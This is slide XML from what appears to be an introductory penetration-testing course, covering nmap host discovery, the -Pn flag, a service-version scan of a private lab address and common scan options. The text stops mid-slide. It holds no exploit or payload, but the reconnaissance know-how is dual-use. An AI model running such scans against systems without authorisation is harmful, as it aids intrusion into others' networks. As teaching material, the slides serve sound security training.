                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No port scan. Only asks: is this host alive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>On a local network it uses ARP, which is fast and almost never blocked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Off the local network it falls back to ICMP echo and probes to 80 and 443</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A silent host is not a dead host. Many block ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4956048"/>
            <a:ext cx="11091672" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5600"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5138928"/>
            <a:ext cx="10515600" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Beginner trap:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>if a host does not answer ping, nmap skips it entirely and you never see its open ports. When you know a host exists, add </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-Pn</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> to say "skip discovery, just scan it".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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02 / SCANNING</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nmap, the tool you open first</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13</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/nmap_eye.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="1600200"/>
            <a:ext cx="3703320" cy="2157984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1554480"/>
            <a:ext cx="6949440" cy="3108960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Written by Gordon Lyon, 1997. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Still the tool every pentester opens first.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It sends packets and reads the replies. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>That is the whole idea. Everything else is options.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It does four jobs: </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>find hosts, find ports, identify services, run scripts against them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Free, open source, and in every distro. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Learning it well is the highest return per hour in this course.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4206240"/>
            <a:ext cx="11091672" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3333"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4389120"/>
            <a:ext cx="5486400" cy="320040"/>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Start with this one</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4718304"/>
            <a:ext cx="10515600" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>sudo nmap -sV 192.168.56.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5212080"/>
            <a:ext cx="10515600" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scan the common ports and ask every service what it is. That is enough to fill an afternoon.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5596128"/>
            <a:ext cx="10515600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Add pieces later, one at a time:   </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-p-</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> for all 65535 ports,   </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-T4</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> to go faster,   </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-oA scan</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> to keep the output.</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02 / SCANNING</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What a port scan is actually asking</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14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1463040"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>You send one packet to one port. The reply, or the silence, is the entire answer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2057400"/>
            <a:ext cx="3593592" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2188"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2286000"/>
            <a:ext cx="3017520" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you send</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2542032"/>
            <a:ext cx="3017520" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
